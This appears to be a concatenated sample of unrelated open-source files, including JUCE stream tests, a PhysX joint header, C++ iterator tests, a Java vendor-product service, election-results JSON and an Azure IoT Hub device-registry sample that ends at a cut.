String> getLinks() { List<String> fullPathList = datasetConfig.getFullPathList(); PhysicalDatasetPath datasetPath = new PhysicalDatasetPath(fullPathList); Map<String, String> links = new HashMap<>(); links.put("self", datasetPath.toUrlPath()); links.put("query", datasetPath.getQueryUrlPath()); final JobFilters jobFilters = new JobFilters() .addFilter(JobIndexKeys.ALL_DATASETS, datasetPath.toString()) .addFilter(JobIndexKeys.QUERY_TYPE, JobIndexKeys.UI, JobIndexKeys.EXTERNAL); links.put("jobs", jobFilters.toUrl()); return links; } public List<String> getTags() { return tags; } }
969
2,270
/* ============================================================================== This file is part of the JUCE library. Copyright (c) 2020 - Raw Material Software Limited JUCE is an open source library subject to commercial or open-source licensing. The code included in this file is provided under the terms of the ISC license http://www.isc.org/downloads/software-support-policy/isc-license. Permission To use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted provided that the above copyright notice and this permission notice appear in all copies. JUCE IS PROVIDED "AS IS" WITHOUT ANY WARRANTY, AND ALL WARRANTIES, WHETHER EXPRESSED OR IMPLIED, INCLUDING MERCHANTABILITY AND FITNESS FOR PURPOSE, ARE DISCLAIMED. ============================================================================== */ namespace juce { int64 juce_fileSetPosition (void* handle, int64 pos); //============================================================================== FileInputStream::FileInputStream (const File& f) : file (f) { openHandle(); } int64 FileInputStream::getTotalLength() { // You should always check that a stream opened successfully before using it! jassert (openedOk()); return file.getSize(); } int FileInputStream::read (void* buffer, int bytesToRead) { // You should always check that a stream opened successfully before using it! jassert (openedOk()); // The buffer should never be null, and a negative size is probably a // sign that something is broken! jassert (buffer != nullptr && bytesToRead >= 0); auto num = readInternal (buffer, (size_t) bytesToRead); currentPosition += (int64) num; return (int) num; } bool FileInputStream::isExhausted() { return currentPosition >= getTotalLength(); } int64 FileInputStream::getPosition() { return currentPosition; } bool FileInputStream::setPosition (int64 pos) { // You should always check that a stream opened successfully before using it! jassert (openedOk()); if (pos != currentPosition) currentPosition = juce_fileSetPosition (fileHandle, pos); return currentPosition == pos; } //============================================================================== //============================================================================== #if JUCE_UNIT_TESTS struct FileInputStreamTests : public UnitTest { FileInputStreamTests() : UnitTest ("FileInputStream", UnitTestCategories::streams) {} void runTest() override { beginTest ("Open stream non-existent file"); { auto tempFile = File::createTempFile (".txt"); expect (! tempFile.exists()); FileInputStream stream (tempFile); expect (stream.failedToOpen()); } beginTest ("Open stream existing file"); { auto tempFile = File::createTempFile (".txt"); tempFile.create(); expect (tempFile.exists()); FileInputStream stream (tempFile); expect (stream.openedOk()); } const MemoryBlock data ("abcdefghijklmnopqrstuvwxyz", 26); File f (File::createTempFile (".txt")); f.appendData (data.getData(), data.getSize()); FileInputStream stream (f); beginTest ("Read"); { expectEquals (stream.getPosition(), (int64) 0); expectEquals (stream.getTotalLength(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), stream.getTotalLength()); expect (! stream.isExhausted()); size_t numBytesRead = 0; MemoryBlock readBuffer (data.getSize()); while (numBytesRead < data.getSize()) { numBytesRead += (size_t) stream.read (&readBuffer[numBytesRead], 3); expectEquals (stream.getPosition(), (int64) numBytesRead); expectEquals (stream.getNumBytesRemaining(), (int64) (data.getSize() - numBytesRead)); expect (stream.isExhausted() == (numBytesRead == data.getSize())); } expectEquals (stream.getPosition(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), (int64) 0); expect (stream.isExhausted()); expect (readBuffer == data); } beginTest ("Skip"); { stream.setPosition (0); expectEquals (stream.getPosition(), (int64) 0); expectEquals (stream.getTotalLength(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), stream.getTotalLength()); expect (! stream.isExhausted()); size_t numBytesRead = 0; const int numBytesToSkip = 5; while (numBytesRead < data.getSize()) { stream.skipNextBytes (numBytesToSkip); numBytesRead += numBytesToSkip; numBytesRead = std::min (numBytesRead, data.getSize()); expectEquals (stream.getPosition(), (int64) numBytesRead); expectEquals (stream.getNumBytesRemaining(), (int64) (data.getSize() - numBytesRead)); expect (stream.isExhausted() == (numBytesRead == data.getSize())); } expectEquals (stream.getPosition(), (int64) data.getSize()); expectEquals (stream.getNumBytesRemaining(), (int64) 0); expect (stream.isExhausted()); f.deleteFile(); } } }; static FileInputStreamTests fileInputStreamTests; #endif } // namespace juce
2,322
445
<reponame>ThomasGale/pytorch-cpp-rl<gh_stars>100-1000 #pragma once #include <torch/torch.h> namespace cpprl { class Distribution { protected: std::vector<int64_t> batch_shape, event_shape; std::vector<int64_t> extended_shape(c10::ArrayRef<int64_t> sample_shape); public: virtual ~Distribution() = 0; virtual torch::Tensor entropy() = 0; virtual torch::Tensor log_prob(torch::Tensor value) = 0; virtual torch::Tensor sample(c10::ArrayRef<int64_t> sample_shape = {}) = 0; }; inline Distribution::~Distribution() {} }
213
2,372
<reponame>Toolchefs/PhysX<gh_stars>1000+ // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of NVIDIA CORPORATION nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ''AS IS'' AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY // OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Copyright (c) 2008-2021 NVIDIA Corporation. All rights reserved. // Copyright (c) 2004-2008 AGEIA Technologies, Inc. All rights reserved. // Copyright (c) 2001-2004 NovodeX AG. All rights reserved. #ifndef PX_JOINTCONSTRAINT_H #define PX_JOINTCONSTRAINT_H /** \addtogroup extensions @{ */ #include "foundation/PxTransform.h" #include "PxRigidActor.h" #include "PxConstraint.h" #include "common/PxBase.h" #if !PX_DOXYGEN namespace physx { #endif class PxRigidActor; class PxScene; class PxPhysics; class PxConstraint; /** \brief an enumeration of PhysX' built-in joint types @see PxJoint */ struct PxJointConcreteType { enum Enum { eSPHERICAL = PxConcreteType::eFIRST_PHYSX_EXTENSION, eREVOLUTE, ePRISMATIC, eFIXED, eDISTANCE, eD6, eCONTACT, eLast }; }; PX_DEFINE_TYPEINFO(PxJoint, PxConcreteType::eUNDEFINED) PX_DEFINE_TYPEINFO(PxD6Joint, PxJointConcreteType::eD6) PX_DEFINE_TYPEINFO(PxDistanceJoint, PxJointConcreteType::eDISTANCE) PX_DEFINE_TYPEINFO(PxContactJoint, PxJointConcreteType::eCONTACT) PX_DEFINE_TYPEINFO(PxFixedJoint, PxJointConcreteType::eFIXED) PX_DEFINE_TYPEINFO(PxPrismaticJoint, PxJointConcreteType::ePRISMATIC) PX_DEFINE_TYPEINFO(PxRevoluteJoint, PxJointConcreteType::eREVOLUTE) PX_DEFINE_TYPEINFO(PxSphericalJoint, PxJointConcreteType::eSPHERICAL) /** \brief an enumeration for specifying one or other of the actors referenced by a joint @see PxJoint */ struct PxJointActorIndex { enum Enum { eACTOR0, eACTOR1, COUNT }; }; /** \brief a base interface providing common functionality for PhysX joints */ class PxJoint : public PxBase { //= ATTENTION! ===================================================================================== // Changing the data layout of this class breaks the binary serialization format. See comments for // PX_BINARY_SERIAL_VERSION. If a modification is required, please adjust the getBinaryMetaData // function. If the modification is made on a custom branch, please change PX_BINARY_SERIAL_VERSION // accordingly. //================================================================================================== public: /** \brief Set the actors for this joint. An actor may be NULL to indicate the world frame. At most one of the actors may be NULL. \param[in] actor0 the first actor. \param[in] actor1 the second actor @see getActors() */ virtual void setActors(PxRigidActor* actor0, PxRigidActor* actor1) = 0; /** \brief Get the actors for this joint. \param[out] actor0 the first actor. \param[out] actor1 the second actor @see setActors() */ virtual void getActors(PxRigidActor*& actor0, PxRigidActor*& actor1) const = 0; /** \brief Set the joint local pose for an actor. This is the relative pose which locates the joint frame relative to the actor. \param[in] actor 0 for the first actor, 1 for the second actor. \param[in] localPose the local pose for the actor this joint @see getLocalPose() */ virtual void setLocalPose(PxJointActorIndex::Enum actor, const PxTransform& localPose) = 0; /** \brief get the joint local pose for an actor. \param[in] actor 0 for the first actor, 1 for the second actor. return the local pose for this joint @see setLocalPose() */ virtual PxTransform getLocalPose(PxJointActorIndex::Enum actor) const = 0; /** \brief get the relative pose for this joint This function returns the pose of the joint frame of actor1 relative to actor0 */ virtual PxTransform getRelativeTransform() const = 0; /** \brief get the relative linear velocity of the joint This function returns the linear velocity of the origin of the constraint frame of actor1, relative to the origin of the constraint frame of actor0. The value is returned in the constraint frame of actor0 */ virtual PxVec3 getRelativeLinearVelocity() const = 0; /** \brief get the relative angular velocity of the joint This function returns the angular velocity of actor1 relative to actor0. The value is returned in the constraint frame of actor0 */ virtual PxVec3 getRelativeAngularVelocity() const = 0; /** \brief set the break force for this joint. if the constraint force or torque on the joint exceeds the specified values, the joint will break, at which point it will not constrain the two actors and the flag PxConstraintFlag::eBROKEN will be set. The force and torque are measured in the joint frame of the first actor \param[in] force the maximum force the joint can apply before breaking \param[in] torque the maximum torque the joint can apply before breaking */ virtual void setBreakForce(PxReal force, PxReal torque) = 0; /** \brief get the break force for this joint. \param[out] force the maximum force the joint can apply before breaking \param[out] torque the maximum torque the joint can apply before breaking @see setBreakForce() */ virtual void getBreakForce(PxReal& force, PxReal& torque) const = 0; /** \brief set the constraint flags for this joint. \param[in] flags the constraint flags @see PxConstraintFlag */ virtual void setConstraintFlags(PxConstraintFlags flags) = 0; /** \brief set a constraint flags for this joint to a specified value. \param[in] flag the constraint flag \param[in] value the value to which to set the flag @see PxConstraintFlag */ virtual void setConstraintFlag(PxConstraintFlag::Enum flag, bool value) = 0; /** \brief get the constraint flags for this joint. \return the constraint flags @see PxConstraintFlag */ virtual PxConstraintFlags getConstraintFlags() const = 0; /** \brief set the inverse mass scale for actor0. \param[in] invMassScale the scale to apply to the inverse mass of actor 0 for resolving this constraint @see getInvMassScale0 */ virtual void setInvMassScale0(PxReal invMassScale) = 0; /** \brief get the inverse mass scale for actor0. \return inverse mass scale for actor0 @see setInvMassScale0 */ virtual PxReal getInvMassScale0() const = 0; /** \brief set the inverse inertia scale for actor0. \param[in] invInertiaScale the scale to apply to the inverse inertia of actor0 for resolving this constraint @see getInvMassScale0 */ virtual void setInvInertiaScale0(PxReal invInertiaScale) = 0; /** \brief get the inverse inertia scale for actor0. \return inverse inertia scale for actor0 @see setInvInertiaScale0 */ virtual PxReal getInvInertiaScale0() const = 0; /** \brief set the inverse mass scale for actor1. \param[in] invMassScale the scale to apply to the inverse mass of actor 1 for resolving this constraint @see getInvMassScale1 */ virtual void setInvMassScale1(PxReal invMassScale) = 0; /** \brief get the inverse mass scale for actor1. \return inverse mass scale for actor1 @see setInvMassScale1 */ virtual PxReal getInvMassScale1() const = 0; /** \brief set the inverse inertia scale for actor1. \param[in] invInertiaScale the scale to apply to the inverse inertia of actor1 for resolving this constraint @see getInvInertiaScale1 */ virtual void setInvInertiaScale1(PxReal invInertiaScale) = 0; /** \brief get the inverse inertia scale for actor1. \return inverse inertia scale for actor1 @see setInvInertiaScale1 */ virtual PxReal getInvInertiaScale1() const = 0; /** \brief Retrieves the PxConstraint corresponding to this joint. This can be used to determine, among other things, the force applied at the joint. \return the constraint */ virtual PxConstraint* getConstraint() const = 0; /** \brief Sets a name string for the object that can be retrieved with getName(). This is for debugging and is not used by the SDK. The string is not copied by the SDK, only the pointer is stored. \param[in] name String to set the objects name to. @see getName() */ virtual void setName(const char* name) = 0; /** \brief Retrieves the name string set with setName(). \return Name string associated with object. @see setName() */ virtual const char* getName() const = 0; /** \brief Deletes the joint. \note This call does not wake up the connected rigid bodies. */ virtual void release() = 0; /** \brief Retrieves the scene which this joint belongs to. \return Owner Scene. NULL if not part of a scene. @see PxScene */ virtual PxScene* getScene() const = 0; void* userData; //!< user can assign this to whatever, usually to create a 1:1 relationship with a user object. //serialization /** \brief Put class meta data in stream, used for serialization */ static void getBinaryMetaData(PxOutputStream& stream); //~serialization protected: virtual ~PxJoint() {} //serialization /** \brief Constructor */ PX_INLINE PxJoint(PxType concreteType, PxBaseFlags baseFlags) : PxBase(concreteType, baseFlags), userData(NULL) {} /** \brief Deserialization constructor */ PX_INLINE PxJoint(PxBaseFlags baseFlags) : PxBase(baseFlags) {} /** \brief Returns whether a given type name matches with the type of this instance */ virtual bool isKindOf(const char* name) const { return !::strcmp("PxJoint", name) || PxBase::isKindOf(name); } //~serialization }; class PxSpring { //= ATTENTION! ===================================================================================== // Changing the data layout of this class breaks the binary serialization format. See comments for // PX_BINARY_SERIAL_VERSION. If a modification is required, please adjust the getBinaryMetaData // function. If the modification is made on a custom branch, please change PX_BINARY_SERIAL_VERSION // accordingly. //================================================================================================== public: PxReal stiffness; //!< the spring strength of the drive: that is, the force proportional to the position error PxReal damping; //!< the damping strength of the drive: that is, the force proportional to the velocity error PxSpring(PxReal stiffness_, PxReal damping_): stiffness(stiffness_), damping(damping_) {} }; #if !PX_DOXYGEN } // namespace physx #endif /** \brief Helper function to setup a joint's global frame This replaces the following functions from previous SDK versions: void NxJointDesc::setGlobalAnchor(const NxVec3& wsAnchor); void NxJointDesc::setGlobalAxis(const NxVec3& wsAxis); The function sets the joint's localPose using world-space input parameters. \param[in] wsAnchor Global frame anchor point. <b>Range:</b> position vector \param[in] wsAxis Global frame axis. <b>Range:</b> direction vector \param[in,out] joint Joint having its global frame set. */ PX_C_EXPORT void PX_CALL_CONV PxSetJointGlobalFrame(physx::PxJoint& joint, const physx::PxVec3* wsAnchor, const physx::PxVec3* wsAxis); /** @} */ #endif
4,050
629
headers = dict({"X-MIP-ACCESS-TOKEN": "XXXXXxXX-xxXX-<PASSWORD>-<PASSWORD>-<PASSWORD>", "X-MIP-CHANNEL": "ANDROID", "X-MIP-Device-Id": "1", "X-MIP-APP-VERSION": "1.0.1", "X-MIP-APP-VERSION-ID": "1"}); def sendingRequest(msg, initiator, helper): for x in list(headers): msg.getRequestHeader().setHeader(x, headers[x]); def responseReceived(msg, initiator, helper): pass;
241
1,050
#define DEFINE_DEFAULT_ITERATOR_CTOR #define CHAR_RANGE_DEFAULT_CONSTRUCTIBLE #include "helpers.hpp" #undef CHAR_RANGE_DEFAULT_CONSTRUCTIBLE #undef DEFINE_DEFAULT_ITERATOR_CTOR #include <combinations.hpp> #include <iterator> #include <set> #include <string> #include <vector> #include "catch.hpp" using iter::combinations; using itertest::BasicIterable; using itertest::SolidInt; using CharCombSet = std::vector<std::vector<char>>; TEST_CASE("combinations: Simple combination of 4", "[combinations]") { std::string s{"ABCD"}; CharCombSet sc; SECTION("Normal call") { for (auto&& v : combinations(s, 2)) { sc.emplace_back(std::begin(v), std::end(v)); } } SECTION("Pipe") { for (auto&& v : s | combinations(2)) { sc.emplace_back(std::begin(v), std::end(v)); } } CharCombSet ans = { {'A', 'B'}, {'A', 'C'}, {'A', 'D'}, {'B', 'C'}, {'B', 'D'}, {'C', 'D'}}; REQUIRE(ans == sc); } TEST_CASE("combinations: const iteration", "[combinations][const]") { std::string s{"ABCD"}; CharCombSet sc; const auto comb = combinations(s, 2); for (auto&& v : comb) { sc.emplace_back(std::begin(v), std::end(v)); } CharCombSet ans = { {'A', 'B'}, {'A', 'C'}, {'A', 'D'}, {'B', 'C'}, {'B', 'D'}, {'C', 'D'}}; REQUIRE(ans == sc); } TEST_CASE( "combinations: const iterators can be compared to non-const iterators", "[combinations][const]") { std::string s{"ABC"}; auto c = combinations(s, 2); const auto& cc = c; (void)(std::begin(c) == std::end(cc)); } TEST_CASE("combinations: Works with different begin and end types", "[combinations]") { CharRange cr{'e'}; CharCombSet sc; for (auto&& v : combinations(cr, 2)) { sc.emplace_back(std::begin(v), std::end(v)); } CharCombSet ans = { {'a', 'b'}, {'a', 'c'}, {'a', 'd'}, {'b', 'c'}, {'b', 'd'}, {'c', 'd'}}; REQUIRE(ans == sc); } TEST_CASE("combinations: iterators can be compared", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 2); auto it = std::begin(c); REQUIRE(it == std::begin(c)); REQUIRE_FALSE(it != std::begin(c)); ++it; REQUIRE(it != std::begin(c)); REQUIRE_FALSE(it == std::begin(c)); } TEST_CASE("combinations: operator->", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 2); auto it = std::begin(c); REQUIRE(it->size() == 2); } TEST_CASE("combinations: size too large gives no results", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 5); REQUIRE(std::begin(c) == std::end(c)); } TEST_CASE("combinations: size 0 gives nothing", "[combinations]") { std::string s{"ABCD"}; auto c = combinations(s, 0); REQUIRE(std::begin(c) == std::end(c)); } TEST_CASE( "combinations: iterable without operator*() const", "[combinations]") { BasicIterable<char> bi{'x', 'y', 'z'}; auto c = combinations(bi, 1); auto it = std::begin(c); ++it; (*it)[0]; } TEST_CASE("combinations: binds to lvalues, moves rvalues", "[combinations]") { BasicIterable<char> bi{'x', 'y', 'z'}; SECTION("binds to lvalues") { combinations(bi, 1); REQUIRE_FALSE(bi.was_moved_from()); } SECTION("moves rvalues") { combinations(std::move(bi), 1); REQUIRE(bi.was_moved_from()); } } TEST_CASE("combinations: doesn't move or copy elements of iterable", "[combinations]") { constexpr SolidInt arr[] = {{6}, {7}, {8}}; for (auto&& i : combinations(arr, 1)) { (void)i; } } TEST_CASE("combinations: iterator meets requirements", "[combinations]") { std::string s{"abc"}; auto c = combinations(s, 1); REQUIRE(itertest::IsIterator<decltype(std::begin(c))>::value); auto&& row = *std::begin(c); REQUIRE(itertest::IsIterator<decltype(std::begin(row))>::value); } template <typename T> using ImpT = decltype(combinations(std::declval<T>(), 1)); TEST_CASE("combinations: has correct ctor and assign ops", "[combinations]") { REQUIRE(itertest::IsMoveConstructibleOnly<ImpT<std::string&>>::value); REQUIRE(itertest::IsMoveConstructibleOnly<ImpT<std::string>>::value); }
1,636
335
{ "word": "Practically", "definitions": [ "Virtually; almost.", "In a practical manner.", "In practical terms." ], "parts-of-speech": "Adverb" }
85
575
<gh_stars>100-1000 // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "ash/wm/window_cycle/window_cycle_tab_slider_button.h" #include "ash/style/ash_color_provider.h" #include "base/strings/utf_string_conversions.h" #include "ui/gfx/canvas.h" #include "ui/views/background.h" #include "ui/views/controls/label.h" #include "ui/views/layout/box_layout.h" #include "ui/views/metadata/metadata_impl_macros.h" namespace ash { namespace { // The height of the tab slider button. constexpr int kTabSliderButtonHeight = 32; // The horizontal insets between the label and the button. constexpr int kTabSliderButtonHorizontalInsets = 20; // The font size of the button label. constexpr int kTabSliderButtonLabelFontSizeDp = 13; } // namespace WindowCycleTabSliderButton::WindowCycleTabSliderButton( views::Button::PressedCallback callback, const std::u16string& label_text) : LabelButton(std::move(callback), label_text) { SetHorizontalAlignment(gfx::ALIGN_CENTER); label()->SetFontList( label() ->font_list() .DeriveWithSizeDelta(kTabSliderButtonLabelFontSizeDp - label()->font_list().GetFontSize()) .DeriveWithWeight(gfx::Font::Weight::MEDIUM)); SetEnabledTextColors(AshColorProvider::Get()->GetContentLayerColor( AshColorProvider::ContentLayerType::kTextColorPrimary)); } void WindowCycleTabSliderButton::SetToggled(bool is_toggled) { if (is_toggled == toggled_) return; toggled_ = is_toggled; SetEnabledTextColors(AshColorProvider::Get()->GetContentLayerColor( toggled_ ? AshColorProvider::ContentLayerType::kButtonLabelColorPrimary : AshColorProvider::ContentLayerType::kTextColorPrimary)); } gfx::Size WindowCycleTabSliderButton::CalculatePreferredSize() const { return gfx::Size(label()->GetPreferredSize().width() + 2 * kTabSliderButtonHorizontalInsets, kTabSliderButtonHeight); } BEGIN_METADATA(WindowCycleTabSliderButton, views::LabelButton) END_METADATA } // namespace ash
805
1,144
<gh_stars>1000+ package de.metas.purchasecandidate; import java.util.List; import java.util.Map; import java.util.Optional; import javax.annotation.Nullable; import org.adempiere.mm.attributes.AttributeSetInstanceId; import org.compiere.model.I_C_BPartner; import org.compiere.model.I_C_BPartner_Product; import org.springframework.stereotype.Service; import com.google.common.collect.ImmutableList; import de.metas.bpartner.BPartnerId; import de.metas.bpartner.BPartnerType; import de.metas.bpartner.service.IBPartnerBL; import de.metas.bpartner.service.IBPartnerDAO; import de.metas.bpartner_product.IBPartnerProductDAO; import de.metas.organization.OrgId; import de.metas.pricing.conditions.PricingConditions; import de.metas.pricing.conditions.PricingConditionsId; import de.metas.pricing.conditions.service.IPricingConditionsRepository; import de.metas.product.IProductBL; import de.metas.product.IProductDAO; import de.metas.product.ProductAndCategoryAndManufacturerId; import de.metas.product.ProductId; import de.metas.util.Loggables; import de.metas.util.Services; import de.metas.common.util.CoalesceUtil; import de.metas.util.lang.Percent; import lombok.NonNull; /* * #%L * de.metas.purchasecandidate.base * %% * Copyright (C) 2018 metas GmbH * %% * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as * published by the Free Software Foundation, either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public * License along with this program. If not, see * <http://www.gnu.org/licenses/gpl-2.0.html>. * #L% */ @Service public class VendorProductInfoService { private final IBPartnerBL bpartnerBL; private final IBPartnerProductDAO partnerProductDAO = Services.get(IBPartnerProductDAO.class); private final IBPartnerDAO bpartnersRepo = Services.get(IBPartnerDAO.class); private final IPricingConditionsRepository pricingConditionsRepo = Services.get(IPricingConditionsRepository.class); private final IProductDAO productsRepo = Services.get(IProductDAO.class); private final IProductBL productBL = Services.get(IProductBL.class); public VendorProductInfoService(@NonNull final IBPartnerBL bpartnerBL) { this.bpartnerBL = bpartnerBL; } /** * @return the default instance for the given product and org, or (if there is none) some instance; never returns null; */ public Optional<VendorProductInfo> getDefaultVendorProductInfo( @NonNull final ProductId productId, @NonNull final OrgId orgId) { final List<VendorProductInfo> vendorProductInfos = getVendorProductInfos( productId, orgId); if (vendorProductInfos.isEmpty()) { return Optional.empty(); } final VendorProductInfo defaultOrFirst = vendorProductInfos .stream() .filter(VendorProductInfo::isDefaultVendor) .findFirst() .orElseGet(() -> { Loggables.addLog("No vendorProductInfo was flagged as default; return the first one: {}", vendorProductInfos.get(0)); return vendorProductInfos.get(0); }); return Optional.of(defaultOrFirst); } public List<VendorProductInfo> getVendorProductInfos(@NonNull final ProductId productId, @NonNull final OrgId orgId) { final ProductAndCategoryAndManufacturerId product = productsRepo.retrieveProductAndCategoryAndManufacturerByProductId(productId); final Map<BPartnerId, Integer> discountSchemaIds = bpartnersRepo.retrieveAllDiscountSchemaIdsIndexedByBPartnerId(BPartnerType.VENDOR); if (discountSchemaIds.isEmpty()) { return ImmutableList.of(); // TODO: fallback to productprice } final Map<BPartnerId, I_C_BPartner_Product> bpartnerProductRecords = partnerProductDAO.retrieveByVendorIds(discountSchemaIds.keySet(), productId, orgId); final ImmutableList.Builder<VendorProductInfo> vendorProductInfos = ImmutableList.builder(); for (final Map.Entry<BPartnerId, Integer> entry : discountSchemaIds.entrySet()) { final BPartnerId vendorId = entry.getKey(); final PricingConditionsId pricingConditionsId = PricingConditionsId.ofRepoId(entry.getValue()); final I_C_BPartner_Product bpartnerProductRecord = bpartnerProductRecords.get(vendorId); final VendorProductInfo vendorProductInfo = createVendorProductInfo( vendorId, product, pricingConditionsId, bpartnerProductRecord); vendorProductInfos.add(vendorProductInfo); } return vendorProductInfos.build(); } public VendorProductInfo getVendorProductInfo( @NonNull final BPartnerId vendorId, @NonNull final ProductId productId, @NonNull final OrgId orgId) { final ProductAndCategoryAndManufacturerId product = productsRepo.retrieveProductAndCategoryAndManufacturerByProductId(productId); final int discountSchemaId = bpartnerBL.getDiscountSchemaId(vendorId, BPartnerType.VENDOR.getSOTrx()); final PricingConditionsId pricingConditionsId = PricingConditionsId.ofRepoId(discountSchemaId); final I_C_BPartner_Product bpartnerProductRecord = partnerProductDAO.retrieveByVendorId(vendorId, productId, orgId); return createVendorProductInfo( vendorId, product, pricingConditionsId, bpartnerProductRecord); } private VendorProductInfo createVendorProductInfo( @NonNull final BPartnerId vendorId, @NonNull final ProductAndCategoryAndManufacturerId product, @NonNull final PricingConditionsId pricingConditionsId, @Nullable final I_C_BPartner_Product bpartnerProductRecord) { final I_C_BPartner vendorRecord = bpartnersRepo.getById(vendorId); final boolean aggregatePOs = vendorRecord.isAggregatePO(); final Percent vendorFlatDiscount = Percent.of(vendorRecord.getFlatDiscount()); final PricingConditions pricingConditions = pricingConditionsRepo.getPricingConditionsById(pricingConditionsId); final ProductId productId = product.getProductId(); final String vendorProductNo = CoalesceUtil.coalesceSuppliers( () -> bpartnerProductRecord != null ? bpartnerProductRecord.getVendorProductNo() : null, () -> bpartnerProductRecord != null ? bpartnerProductRecord.getProductNo() : null, () -> productBL.getProductValue(productId)); final String vendorProductName = CoalesceUtil.coalesceSuppliers( () -> bpartnerProductRecord != null ? bpartnerProductRecord.getProductName() : null, () -> productBL.getProductName(productId)); final boolean defaultVendor = bpartnerProductRecord != null ? bpartnerProductRecord.isCurrentVendor() : false; return VendorProductInfo.builder() .vendorId(vendorId) .defaultVendor(defaultVendor) .product(product) .attributeSetInstanceId(AttributeSetInstanceId.NONE) // this might change when we incorporate attribute based pricing .vendorProductNo(vendorProductNo) .vendorProductName(vendorProductName) .aggregatePOs(aggregatePOs) .vendorFlatDiscount(vendorFlatDiscount) .pricingConditions(pricingConditions) .build(); } }
2,408
348
{"nom":"Limay","circ":"8ème circonscription","dpt":"Yvelines","inscrits":9687,"abs":5552,"votants":4135,"blancs":68,"nuls":26,"exp":4041,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":901},{"nuance":"FN","nom":"<NAME>","voix":697},{"nuance":"COM","nom":"<NAME>","voix":696},{"nuance":"FI","nom":"M. <NAME>","voix":592},{"nuance":"LR","nom":"<NAME>","voix":416},{"nuance":"SOC","nom":"Mme <NAME>","voix":183},{"nuance":"DVD","nom":"<NAME>","voix":103},{"nuance":"DLF","nom":"<NAME>","voix":85},{"nuance":"DIV","nom":"Mme <NAME>","voix":76},{"nuance":"EXD","nom":"Mme <NAME>","voix":67},{"nuance":"ECO","nom":"Mme <NAME>","voix":54},{"nuance":"DIV","nom":"M. <NAME>","voix":48},{"nuance":"EXG","nom":"M. <NAME>","voix":41},{"nuance":"DVD","nom":"Mme <NAME>","voix":29},{"nuance":"DIV","nom":"Mme <NAME>","voix":25},{"nuance":"EXG","nom":"M. <NAME>","voix":18},{"nuance":"DIV","nom":"<NAME>","voix":10}]}
360
366
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- import sys import os from azure.iot.hub import IoTHubRegistryManager from azure.iot.hub.models import Twin, TwinProperties iothub_connection_str = os.getenv("IOTHUB_CONNECTION_STRING") device_id = os.getenv("IOTHUB_DEVICE_ID") def print_device_info(title, iothub_device): print(title + ":") print("device_id = {0}".format(iothub_device.device_id)) print("authentication.type = {0}".format(iothub_device.authentication.type)) print("authentication.symmetric_key = {0}".format(iothub_device.authentication.symmetric_key)) print( "authentication.x509_thumbprint = {0}".format(iothub_device.authentication.x509_thumbprint) ) print("connection_state = {0}".format(iothub_device.connection_state)) print( "connection_state_updated_tTime = {0}".format(iothub_device.connection_state_updated_time) ) print( "cloud_to_device_message_count = {0}".format(iothub_device.cloud_to_device_message_count) ) print("device_scope = {0}".format(iothub_device.device_scope)) print("etag = {0}".format(iothub_device.etag)) print("generation_id = {0}".format(iothub_device.generation_id)) print("last_activity_time = {0}".format(iothub_device.last_activity_time)) print("status = {0}".format(iothub_device.status)) print("status_reason = {0}".format(iothub_device.status_reason)) print("status_updated_time = {0}".format(iothub_device.status_updated_time)) print("") # This sample creates and uses device with SAS authentication # For other authentication types use the appropriate create and update APIs: # X509: # new_device = iothub_registry_manager.create_device_with_x509(device_id, primary_thumbprint, secondary_thumbprint, status) # device_updated = iothub_registry_manager.update_device_with_X509(device_id, etag, primary_thumbprint, secondary_thumbprint, status) # Certificate authority: # new_device = iothub_registry_manager.create_device_with_certificate_authority(device_id, status) # device_updated = iothub_registry_manager.update_device_with_certificate_authority(self, device_id, etag, status): try: # Create IoTHubRegistryManager iothub_registry_manager = IoTHubRegistryManager.from_connection_string(iothub_connection_str) # Create a device primary_key = "<KEY>" secondary_key = "<KEY>" device_state = "enabled" new_device = iothub_registry_manager.create_device_with_sas( device_id, primary_key, secondary_key, device_state ) print_device_info("create_device", new_device) # Get device information device = iothub_registry_manager.get_device(device_id) print_device_info("get_device", device) # Update device information primary_key = "<KEY>" secondary_key = "<KEY>" device_state = "disabled" device_updated = iothub_registry_manager.update_device_with_sas( device_id, device.etag, primary_key, secondary_key, device_state ) print_device_info("update_device", device_updated) # Get device twin twin = 